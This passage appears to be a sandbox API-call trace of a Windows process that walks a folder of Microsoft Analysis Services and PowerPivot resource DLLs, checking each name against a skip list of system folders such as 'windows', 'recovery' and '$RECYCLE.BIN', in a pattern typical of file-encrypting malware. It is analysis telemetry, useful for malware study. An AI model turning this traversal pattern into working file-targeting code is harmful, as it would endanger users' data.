dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.546] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0126.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0126.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.546] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9ac3a61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9ac3a61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9ea37c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ff030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.546] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d698, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0126.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.547] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf483611a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf483611a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4a25fae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.547] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0126.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.548] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc240ad7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ca98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.548] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d698, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d920, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0126.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0126.549] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e9d0 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.549] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa531f86, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.549] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.550] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0126.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.550] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf428c77b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf428c77b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42b29f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.550] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 